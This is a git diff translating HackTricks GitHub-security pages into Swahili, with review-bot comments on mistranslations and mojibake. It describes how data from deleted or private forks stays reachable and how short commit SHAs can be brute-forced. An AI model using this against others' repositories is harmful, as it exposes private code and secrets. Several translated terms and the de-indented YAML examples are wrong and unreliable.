@@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul
- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index ae156de2d..141152bd4 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,6 +1 @@
-# Gh Actions - Artifact Poisoning
-
-
-
-
-
+# Gh Actions - Upoisonaji wa Vitu vya Kazi
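Review bot: `+# Gh Actions - Upoisonaji wa Vitu vya Kazi` names the same concept as the `### Upoison wa Kazi` heading introduced for the parent page in this patch, but with different wording; pick one rendering of "Artifact Poisoning" (ideally keeping the English term) and use it in both places so the sub-page title matches the heading that links to it. The file was already a bare title, so nothing else changes here.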
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
index 024aa5ff8..0abdb25c4 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,6 +1 @@
-# GH Actions - Cache Poisoning
-
-
-
-
-
+# GH Actions - Utoaji wa Sumaku
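Review bot: `+# GH Actions - Utoaji wa Sumaku` does not mean "Cache Poisoning" ("sumaku" is a magnet), so the sub-page title no longer describes its topic; the parent page in this same patch uses `### Upoison wa Cache`, so reuse that wording here (or keep "Cache Poisoning" in English) for consistency.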
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
index 3cd632bd0..9cef507bc 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,6 +1 @@
# Gh Actions - Context Script Injections
-
-
-
-
-
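Review bot: only trailing blank lines are removed here and `# Gh Actions - Context Script Injections` stays in English, while the two sibling sub-pages in this patch have their titles translated; either translate this one the same way or leave all three titles in English so the sub-page naming is consistent.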
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
index f19fa699e..025ffd279 100644
--- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -2,59 +2,55 @@
{{#include ../../banners/hacktricks-training.md}}
-This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+Njia hizi za kufikia data kutoka Github ambayo ilionekana kufutwa [**ziliripotiwa katika chapisho hili la blog**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
## Accessing Deleted Fork Data
-1. You fork a public repository
-2. You commit code to your fork
-3. You delete your fork
+1. Unafanya fork ya hifadhi ya umma
+2. Unafanya commit ya msimbo kwenye fork yako
+3. Unafuta fork yako
> [!CAUTION]
-> The data commited in the deleted fork is still accessible.
+> Data iliyofanywa commit katika fork iliyofutwa bado inapatikana.
## Accessing Deleted Repo Data
-1. You have a public repo on GitHub.
-2. A user forks your repo.
-3. You commit data after they fork it (and they never sync their fork with your updates).
-4. You delete the entire repo.
+1. Una hifadhi ya umma kwenye GitHub.
+2. Mtumiaji anafanya fork ya hifadhi yako.
+3. Unafanya commit ya data baada ya wao kuifanya fork (na hawajawahi kusawazisha fork yao na masasisho yako).
+4. Unafuta hifadhi nzima.
> [!CAUTION]
-> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+> Hata kama umefuta hifadhi yako, mabadiliko yote yaliyofanywa kwenye hiyo bado yanapatikana kupitia forks.
## Accessing Private Repo Data
-1. You create a private repo that will eventually be made public.
-2. You create a private, internal version of that repo (via forking) and commit additional code for features that youāre not going to make public.
-3. You make your āupstreamā repository public and keep your fork private.
+1. Unaunda hifadhi ya kibinafsi ambayo hatimaye itafanywa kuwa ya umma.
+2. Unaunda toleo la kibinafsi, la ndani la hifadhi hiyo (kupitia forking) na kufanya commit ya msimbo wa ziada kwa vipengele ambavyo huenda usifanye kuwa ya umma.
+3. Unafanya hifadhi yako ya āupstreamā kuwa ya umma na kuweka fork yako kuwa ya kibinafsi.
> [!CAUTION]
-> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+> Inawezekana kufikia data yote iliyosukumwa kwenye fork ya ndani katika kipindi kati ya kuundwa kwa fork ya ndani na toleo la umma lilipofanywa kuwa la umma.
## How to discover commits from deleted/hidden forks
-The same blog post propose 2 options:
+Chapisho sawa la blog linapendekeza chaguzi 2:
### Directly accessing the commit
-If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
+Ikiwa thamani ya ID ya commit (sha-1) inajulikana inawezekana kuifikia katika `https://github.com///commit/`
### Brute-forcing short SHA-1 values
-It's the same to access both of these:
+Ni sawa kufikia zote hizi mbili:
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
-And the latest one use a short sha-1 that is bruteforceable.
+Na ya hivi karibuni inatumia sha-1 fupi ambayo inaweza kufanywa brute force.
## References
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
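Review bot: `+3. Unafanya hifadhi yako ya āupstreamā kuwa ya umma na kuweka fork yako kuwa ya kibinafsi.` carries over the mojibake quote characters (`ā`) from the removed line instead of fixing them; write plain `"upstream"`. Likewise `+Ikiwa thamani ya ID ya commit (sha-1) inajulikana inawezekana kuifikia katika `https://github.com///commit/`` reproduces a URL template whose path placeholders were lost (three empty segments), so the instruction is unusable as written; restore placeholders such as `<owner>/<repo>/commit/<sha>` in the translated line. Note also that the section headings in this file (`## Accessing Deleted Fork Data`, `### Brute-forcing short SHA-1 values`) remain English while their bodies are translated; confirm whether headings are intentionally out of scope.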
diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
index ae1365a0f..deff5d5d3 100644
--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -4,191 +4,185 @@
## Basic Structure
-The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
+Muundo wa msingi wa mazingira ya github ya **kampuni** kubwa ni kumiliki **enterprise** ambayo inamiliki **mashirika kadhaa** na kila moja yao inaweza kuwa na **hifadhi kadhaa** na **timu kadhaa**. Kampuni ndogo zinaweza kumiliki tu **shirika moja na hakuna enterprise**.
-From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
+Kwa mtazamo wa mtumiaji, **mtumiaji** anaweza kuwa **mwanachama** wa **mashirika na enterprises tofauti**. Ndani yao, mtumiaji anaweza kuwa na **mifumo tofauti ya enterprise, shirika na hifadhi**.
-Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
+Zaidi ya hayo, mtumiaji anaweza kuwa **sehemu ya timu tofauti** zikiwa na mifumo tofauti ya enterprise, shirika au hifadhi.
-And finally **repositories may have special protection mechanisms**.
+Na hatimaye, **hifadhi zinaweza kuwa na mifumo maalum ya ulinzi**.
## Privileges
### Enterprise Roles
-- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **Mmiliki wa Enterprise**: Watu wenye jukumu hili wanaweza **kusimamia wasimamizi, kusimamia mashirika ndani ya enterprise, kusimamia mipangilio ya enterprise, kutekeleza sera katika mashirika**. Hata hivyo, hawawezi **kufikia mipangilio ya shirika au maudhui** isipokuwa wametengenezwa kuwa mmiliki wa shirika au kupewa ufikiaji wa moja kwa moja kwa hifadhi inayomilikiwa na shirika.
+- **Wajumbe wa Enterprise**: Wajumbe wa mashirika yanayomilikiwa na enterprise yako pia ni **wanachama wa enterprise** kiotomatiki.
### Organization Roles
-In an organisation users can have different roles:
+Katika shirika, watumiaji wanaweza kuwa na mifumo tofauti:
-- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
-- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **Wamiliki wa Shirika**: Wamiliki wa shirika wana **ufikiaji kamili wa kiutawala kwa shirika lako**. Jukumu hili linapaswa kuwa na mipaka, lakini si chini ya watu wawili, katika shirika lako.
+- **Wajumbe wa Shirika**: Jukumu la **kawaida**, lisilo la kiutawala kwa **watu katika shirika** ni mwanachama wa shirika. Kwa kawaida, wajumbe wa shirika **wana idadi ya ruhusa**.
+- **Wasimamizi wa Malipo**: Wasimamizi wa malipo ni watumiaji wanaoweza **kusimamia mipangilio ya malipo kwa shirika lako**, kama vile taarifa za malipo.
+- **Wasimamizi wa Usalama**: Ni jukumu ambalo wamiliki wa shirika wanaweza kuteua kwa timu yoyote katika shirika. Wakati linapotumika, linawapa kila mwanachama wa timu ruhusa za **kusimamia tahadhari za usalama na mipangilio katika shirika lako, pamoja na ruhusa za kusoma kwa hifadhi zote** katika shirika.
+- Ikiwa shirika lako lina timu ya usalama, unaweza kutumia jukumu la msimamizi wa usalama kuwapa wanachama wa timu ufikiaji mdogo wanahitaji kwa shirika.
+- **Wasimamizi wa Github App**: Ili kuruhusu watumiaji wengine **kusimamia Github Apps zinazomilikiwa na shirika**, mmiliki anaweza kuwapa ruhusa za msimamizi wa Github App.
+- **Washirikishi wa Nje**: Mshirikishi wa nje ni mtu ambaye ana **ufikiaji wa hifadhi moja au zaidi za shirika lakini si mwanachama** wa shirika kwa wazi.
-You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
+Unaweza **kulinganisha ruhusa** za mifumo hii katika jedwali hili: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
### Members Privileges
-In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+Katika _https://github.com/organizations/\/settings/member_privileges_ unaweza kuona **ruhusa ambazo watumiaji watakuwa nazo kwa kuwa sehemu ya shirika**.
-The settings here configured will indicate the following permissions of members of the organisation:
+Mipangilio hapa iliyowekwa itaonyesha ruhusa zifuatazo za wanachama wa shirika:
-- Be admin, writer, reader or no permission over all the organisation repos.
-- If members can create private, internal or public repositories.
-- If forking of repositories is possible
-- If it's possible to invite outside collaborators
-- If public or private sites can be published
-- The permissions admins has over the repositories
-- If members can create new teams
+- Kuwa msimamizi, mwandishi, msomaji au hakuna ruhusa juu ya hifadhi zote za shirika.
+- Ikiwa wanachama wanaweza kuunda hifadhi za kibinafsi, za ndani au za umma.
+- Ikiwa kuiga hifadhi kunawezekana
+- Ikiwa inawezekana kuwalika washirikishi wa nje
+- Ikiwa tovuti za umma au za kibinafsi zinaweza kuchapishwa
+- Ruhusa ambazo wasimamizi wanazo juu ya hifadhi
+- Ikiwa wanachama wanaweza kuunda timu mpya
### Repository Roles
-By default repository roles are created:
+Kwa kawaida mifumo ya hifadhi huundwa:
-- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
-- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
-- **Write**: Recommended for contributors who **actively push to your project**
-- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
-- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+- **Soma**: Inapendekezwa kwa **wasaidizi wasio wa msimbo** wanaotaka kuona au kujadili mradi wako
+- **Triage**: Inapendekezwa kwa **wasaidizi wanaohitaji kusimamia masuala na ombi la kuvuta** bila ufikiaji wa kuandika
+- **Andika**: Inapendekezwa kwa wasaidizi ambao **wanasukuma kwa nguvu kwenye mradi wako**
+- **Simamisha**: Inapendekezwa kwa **wasimamizi wa mradi wanaohitaji kusimamia hifadhi** bila ufikiaji wa vitendo nyeti au vya kuharibu
+- **Msimamizi**: Inapendekezwa kwa watu wanaohitaji **ufikiaji kamili wa mradi**, ikiwa ni pamoja na vitendo nyeti na vya kuharibu kama kusimamia usalama au kufuta hifadhi
-You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
+Unaweza **kulinganisha ruhusa** za kila jukumu katika jedwali hili [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
-You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
+Unaweza pia **kuunda mifumo yako mwenyewe** katika _https://github.com/organizations/\/settings/roles_
### Teams
-You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+Unaweza **orodhesha timu zilizoundwa katika shirika** katika _https://github.com/orgs/\/teams_. Kumbuka kuwa ili kuona timu ambazo ni watoto wa timu nyingine unahitaji kufikia kila timu ya mzazi.
### Users
-The users of an organization can be **listed** in _https://github.com/orgs/\/people._
+Watumiaji wa shirika wanaweza **orodheshwa** katika _https://github.com/orgs/\/people._
-In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+Katika taarifa za kila mtumiaji unaweza kuona **timu ambazo mtumiaji ni mwanachama wa**, na **hifadhi ambazo mtumiaji ana ufikiaji wa**.
## Github Authentication
-Github offers different ways to authenticate to your account and perform actions on your behalf.
+Github inatoa njia tofauti za kuthibitisha akaunti yako na kufanya vitendo kwa niaba yako.
### Web Access
-Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
+Kwa kufikia **github.com** unaweza kuingia kwa kutumia **jina lako la mtumiaji na nenosiri** (na **2FA huenda**).
### **SSH Keys**
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
+Unaweza kuunda akaunti yako na funguo moja au kadhaa za umma zinazoruhusu **funguo binafsi zinazohusiana kufanya vitendo kwa niaba yako.** [https://github.com/settings/keys](https://github.com/settings/keys)
#### **GPG Keys**
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
+Huwezi **kujifanya kuwa mtumiaji kwa funguo hizi** lakini ikiwa huzitumii inaweza kuwa inawezekana kwamba **unagundulika kwa kutuma commits bila saini**. Jifunze zaidi kuhusu [mode ya uangalizi hapa](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
### **Personal Access Tokens**
-You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
+Unaweza kuunda token za ufikiaji wa kibinafsi ili **kutoa ufikiaji wa programu kwa akaunti yako**. Wakati wa kuunda token ya ufikiaji wa kibinafsi, **mtumiaji** anahitaji **kueleza** **ruhusa** ambazo **token** itakuwa nazo. [https://github.com/settings/tokens](https://github.com/settings/tokens)
### Oauth Applications
-Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
+Programu za Oauth zinaweza kukuomba ruhusa **za kufikia sehemu ya taarifa zako za github au kujifanya kuwa wewe** ili kufanya vitendo fulani. Mfano wa kawaida wa kazi hii ni **kitufe cha kuingia na github** ambacho unaweza kukutana nacho katika baadhi ya majukwaa.
-- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
-- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
-- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
-- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_
+- Unaweza **kuunda** programu zako za **Oauth** katika [https://github.com/settings/developers](https://github.com/settings/developers)
+- Unaweza kuona **programu za Oauth ambazo zina ufikiaji wa akaunti yako** katika [https://github.com/settings/applications](https://github.com/settings/applications)
+- Unaweza kuona **mipaka ambayo Oauth Apps zinaweza kuomba** katika [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
+- Unaweza kuona ufikiaji wa wahusika wengine wa programu katika **shirika** katika _https://github.com/organizations/\/settings/oauth_application_policy_
-Some **security recommendations**:
+Baadhi ya **mapendekezo ya usalama**:
-- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
-- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
-- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
-- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+- **Programu ya OAuth** inapaswa kila wakati **kufanya kama mtumiaji aliyethibitishwa wa GitHub katika GitHub yote** (kwa mfano, wakati wa kutoa arifa za mtumiaji) na kwa ufikiaji tu wa mipaka iliyotajwa.
+- Programu ya OAuth inaweza kutumika kama mtoa kitambulisho kwa kuwezesha "Ingia na GitHub" kwa mtumiaji aliyethibitishwa.
+- **Usijenge** **Programu ya OAuth** ikiwa unataka programu yako ifanye kazi kwenye **hifadhi moja**. Kwa mipaka ya `repo`, Programu za OAuth zinaweza **kufanya kazi kwenye \_zote**\_\*\* za hifadhi za mtumiaji aliyethibitishwa\*\*.
+- **Usijenge** Programu ya OAuth ili kufanya kazi kama programu kwa **timu au kampuni** yako. Programu za OAuth zinathibitishwa kama **mtumiaji mmoja**, hivyo ikiwa mtu mmoja anaunda Programu ya OAuth kwa kampuni kutumia, na kisha anaondoka kampuni, hakuna mtu mwingine atakayekuwa na ufikiaji wake.
+- **Zaidi** katika [hapa](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
### Github Applications
-Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
+Programu za Github zinaweza kuomba ruhusa za **kufikia taarifa zako za github au kujifanya kuwa wewe** ili kufanya vitendo maalum juu ya rasilimali maalum. Katika Programu za Github unahitaji kueleza hifadhi ambazo programu itakuwa na ufikiaji.
-- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
-- The GitHub App should **connect to a personal account or an organisation**.
-- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
-- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
-- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
-- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_
+- Ili kufunga Programu ya GitHub, lazima uwe **mmiliki wa shirika au uwe na ruhusa za msimamizi** katika hifadhi.
+- Programu ya GitHub inapaswa **kuunganishwa na akaunti binafsi au shirika**.
+- Unaweza kuunda programu yako mwenyewe ya Github katika [https://github.com/settings/apps](https://github.com/settings/apps)
+- Unaweza kuona **programu zote za Github ambazo zina ufikiaji wa akaunti yako** katika [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
+- Hizi ni **API Endpoints za Programu za Github** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Kulingana na ruhusa za Programu itakuwa na uwezo wa kufikia baadhi yao
+- Unaweza kuona programu zilizofungwa katika **shirika** katika _https://github.com/organizations/\/settings/installations_
-Some security recommendations:
+Baadhi ya mapendekezo ya usalama:
-- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
-- Make sure the GitHub App integrates with **specific repositories**.
-- The GitHub App should **connect to a personal account or an organisation**.
-- Don't expect the GitHub App to know and do everything a user can.
-- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
-- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
-- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+- Programu ya GitHub inapaswa **kuchukua hatua bila ya mtumiaji** (isipokuwa programu inatumia [token ya mtumiaji-kwa-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests)). Ili kuweka token za ufikiaji wa mtumiaji-kwa-server kuwa salama zaidi, unaweza kutumia token za ufikiaji ambazo zitakoma baada ya masaa 8, na token ya upya ambayo inaweza kubadilishwa kwa token mpya ya ufikiaji. Kwa maelezo zaidi, angalia "[Kurefresh token za ufikiaji wa mtumiaji-kwa-server](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
+- Hakikisha Programu ya GitHub inajumuisha **hifadhi maalum**.
+- Programu ya GitHub inapaswa **kuunganishwa na akaunti binafsi au shirika**.
+- Usitarajie Programu ya GitHub ijue na kufanya kila kitu ambacho mtumiaji anaweza.
+- **Usitumie Programu ya GitHub ikiwa unahitaji tu huduma ya "Ingia na GitHub"**. Lakini Programu ya GitHub inaweza kutumia [mchakato wa utambulisho wa mtumiaji](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) kuingia kwa watumiaji _na_ kufanya mambo mengine.
+- Usijenge Programu ya GitHub ikiwa unataka _tu_ kufanya kazi kama mtumiaji wa GitHub na kufanya kila kitu ambacho mtumiaji huyo anaweza kufanya.
+- Ikiwa unatumia programu yako na GitHub Actions na unataka kubadilisha faili za workflow, lazima uthibitishe kwa niaba ya mtumiaji kwa token ya OAuth ambayo inajumuisha mipaka ya `workflow`. Mtumiaji lazima awe na ruhusa ya msimamizi au kuandika kwa hifadhi ambayo ina faili ya workflow. Kwa maelezo zaidi, angalia "[Kuelewa mipaka kwa programu za OAuth](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
+- **Zaidi** katika [hapa](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
### Github Actions
-This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
+Hii **si njia ya kuthibitisha katika github**, lakini **kitendo kibaya** cha Github kinaweza kupata **ufikiaji usioidhinishwa kwa github** na **kulingana** na **privileges** zilizotolewa kwa Kitendo kadhaa **shambulio tofauti** zinaweza kufanywa. Tazama hapa chini kwa maelezo zaidi.
## Git Actions
-Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
+Vitendo vya Git vinaruhusu kuendesha **utendaji wa msimbo wakati tukio linapotokea**. Kwa kawaida, msimbo unaotekelezwa ni **kama vile unavyohusiana na msimbo wa hifadhi** (labda kujenga kontena la docker au kuangalia kwamba PR haina siri).
### Configuration
-In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+Katika _https://github.com/organizations/\/settings/actions_ inawezekana kuangalia **mipangilio ya vitendo vya github** kwa shirika.
-It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
+Inawezekana kukataa matumizi ya vitendo vya github kabisa, **kuruhusu vitendo vyote vya github**, au kuruhusu vitendo fulani tu.
-It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
+Pia inawezekana kuunda **nani anahitaji idhini ili kuendesha Kitendo cha Github** na **ruhusa za GITHUB_TOKEN** za Kitendo cha Github wakati kinapotekelezwa.
### Git Secrets
-Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
-
-These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
+Vitendo vya Github kwa kawaida vinahitaji aina fulani za siri ili kuingiliana na github au programu za wahusika wengine. Ili **kuepuka kuweka wazi** katika hifadhi, github inaruhusu kuweka kama **Siri**.
+Siri hizi zinaweza kuundwa **kwa hifadhi au kwa shirika lote**. Kisha, ili **Kitendo kiweze kufikia siri** unahitaji kuziandika kama:
```yaml
steps:
- - name: Hello world action
- with: # Set the secret as an input
- super_secret:${{ secrets.SuperSecret }}
- env: # Or as an environment variable
- super_secret:${{ secrets.SuperSecret }}
+- name: Hello world action
+with: # Set the secret as an input
+super_secret:${{ secrets.SuperSecret }}
+env: # Or as an environment variable
+super_secret:${{ secrets.SuperSecret }}
```
-
-#### Example using Bash
-
+#### Mfano wa kutumia Bash
```yaml
steps:
- - shell: bash
- env: SUPER_SECRET:${{ secrets.SuperSecret }}
- run: |
- example-command "$SUPER_SECRET"
+- shell: bash
+env: SUPER_SECRET:${{ secrets.SuperSecret }}
+run: |
+example-command "$SUPER_SECRET"
```
-
> [!WARNING]
-> Secrets **can only be accessed from the Github Actions** that have them declared.
+> Siri **zinaweza kufikiwa tu kutoka kwa Github Actions** ambazo zina matangazo yao.
-> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
+> Mara tu zinapowekwa kwenye repo au mashirika **watumiaji wa github hawawezi kuzifikia tena**, wataweza tu **kuzibadilisha**.
-Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
+Hivyo, **njia pekee ya kuiba siri za github ni kuwa na uwezo wa kufikia mashine inayotekeleza Github Action** (katika hali hiyo utaweza kufikia tu siri zilizotangazwa kwa ajili ya Action).
### Git Environments
-Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
-
+Github inaruhusu kuunda **mazingira** ambapo unaweza kuhifadhi **siri**. Kisha, unaweza kutoa ufikiaji wa github action kwa siri ndani ya mazingira kwa kitu kama:
```yaml
jobs:
- deployment:
- runs-on: ubuntu-latest
- environment: env_name
+deployment:
+runs-on: ubuntu-latest
+environment: env_name
```
-
You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
